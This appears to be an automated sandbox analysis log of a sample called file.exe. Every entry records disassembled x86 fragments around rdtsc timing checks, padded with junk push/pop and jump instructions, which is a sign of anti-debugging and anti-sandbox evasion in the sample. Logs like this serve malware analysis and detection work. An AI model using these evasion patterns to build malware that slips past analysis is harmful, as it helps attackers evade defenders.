                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC1182 second address: EC11AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F450CC4AB16h 0x0000000a jg 00007F450CC4AB16h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F450CC4AB27h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC11AD second address: EC11B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F450CC4A606h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC11B9 second address: EC11BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC17B5 second address: EC17BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC17BA second address: EC17BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC17BF second address: EC17C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC17C5 second address: EC17CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC1FCE second address: EC1FF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F450CC4A606h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F450CC4A60Dh 0x00000012 jp 00007F450CC4A606h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC79FE second address: EC7A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC7A02 second address: EC7A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC911B second address: EC9121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC59C second address: ECC5BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F450CC4A612h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC5BD second address: ECC5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC5C3 second address: ECC5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F450CC4A606h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC5CE second address: ECC5D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC5D4 second address: ECC5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC716 second address: ECC72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB24h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECCB65 second address: ECCB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F450CC4A60Eh 0x00000011 jno 00007F450CC4A606h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3B3E second address: ED3B49 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3CA1 second address: ED3CAD instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3CAD second address: ED3CD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F450CC4AB16h 0x00000009 jmp 00007F450CC4AB27h 0x0000000e pop ecx 0x0000000f jnp 00007F450CC4AB22h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3CD6 second address: ED3CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E39 second address: ED3E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E3E second address: ED3E5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E5E second address: ED3E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED413E second address: ED414E instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A606h 0x00000008 jp 00007F450CC4A606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED414E second address: ED4168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F450CC4AB16h 0x0000000a jmp 00007F450CC4AB20h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0370 second address: EE0374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0069 second address: EE0072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0072 second address: EE0099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A612h 0x00000007 jp 00007F450CC4A608h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F450CC4A606h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0099 second address: EE009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE009D second address: EE00A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE00A7 second address: EE00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB651 second address: EEB669 instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A612h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F450CC4A60Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB669 second address: EEB6A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB20h 0x00000007 jo 00007F450CC4AB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jne 00007F450CC4AB16h 0x0000001a jg 00007F450CC4AB16h 0x00000020 push eax 0x00000021 pop eax 0x00000022 jo 00007F450CC4AB16h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB6A3 second address: EEB6B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB6B7 second address: EEB6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEB6BD second address: EEB6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED256 second address: EED25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED25A second address: EED25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED25E second address: EED26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 je 00007F450CC4AB16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F046F5 second address: F046F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F046F9 second address: F046FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F046FF second address: F04705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04705 second address: F0470D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0470D second address: F04711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F05FBD second address: F05FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A18A second address: F0A196 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F450CC4A606h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A196 second address: F0A19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AA92 second address: F0AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007F450CC4A619h 0x0000000e pop ecx 0x0000000f jo 00007F450CC4A614h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DBD9 second address: F1DBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DBDF second address: F1DBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DBE3 second address: F1DBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C2AF second address: F1C2B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C2B3 second address: F1C2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C06A second address: F2C0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F450CC4A614h 0x0000000e jl 00007F450CC4A624h 0x00000014 jmp 00007F450CC4A618h 0x00000019 jne 00007F450CC4A606h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2BF2D second address: F2BF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F301E5 second address: F301F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4A60Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2FF19 second address: F2FF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1E0C6 second address: E1E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4A617h 0x00000009 jmp 00007F450CC4A60Fh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44528 second address: F4452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4452C second address: F44532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4491E second address: F4492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47E29 second address: F47E33 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F450CC4A60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47E33 second address: F47E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48139 second address: F48143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F450CC4A606h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48143 second address: F48147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48438 second address: F4845B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F450CC4A60Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F450CC4A608h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4963A second address: F4963E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4963E second address: F49644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49644 second address: F4964D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CDA7 second address: F4CDB1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAA6 second address: E5FABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D0314 second address: 55D0319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D0319 second address: 55D032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4AB1Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D032A second address: 55D03B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F450CC4A613h 0x00000014 or ax, D4BEh 0x00000019 jmp 00007F450CC4A619h 0x0000001e popfd 0x0000001f pop eax 0x00000020 pushfd 0x00000021 jmp 00007F450CC4A611h 0x00000026 and cx, BEF6h 0x0000002b jmp 00007F450CC4A611h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 movzx ecx, di 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F450CC4A60Fh 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D03B9 second address: 55D03F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F450CC4AB27h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D03F2 second address: 55D040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A614h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D040A second address: 55D040E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0694 second address: 55F0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0698 second address: 55F069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F069C second address: 55F06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F06A2 second address: 55F06EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F450CC4AB22h 0x00000008 pop ecx 0x00000009 mov edx, 3AF94276h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F450CC4AB1Ch 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F450CC4AB20h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F450CC4AB1Ah 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F06EE second address: 55F06FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F06FD second address: 55F0703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0703 second address: 55F0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0707 second address: 55F074E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F450CC4AB1Ch 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov al, bh 0x00000016 pushfd 0x00000017 jmp 00007F450CC4AB26h 0x0000001c or ecx, 16464B88h 0x00000022 jmp 00007F450CC4AB1Bh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F074E second address: 55F0754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0754 second address: 55F0758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0758 second address: 55F0791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F450CC4A616h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F450CC4A60Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0791 second address: 55F0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0797 second address: 55F07C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F450CC4A619h 0x0000000e lea eax, dword ptr [ebp-04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F07C1 second address: 55F07F5 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 4764CAB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F450CC4AB22h 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007F450CC4AB20h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F07F5 second address: 55F0811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0811 second address: 55F0838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4AB25h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0838 second address: 55F083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F098B second address: 55F0991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0991 second address: 55F0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0995 second address: 55F0010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F450CC4AC63h 0x0000001d xor eax, eax 0x0000001f mov dword ptr [esp], 00000000h 0x00000026 mov dword ptr [esp+04h], 00000000h 0x0000002e call 00007F45115B90ABh 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F450CC4AB1Ah 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0010 second address: 55F0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
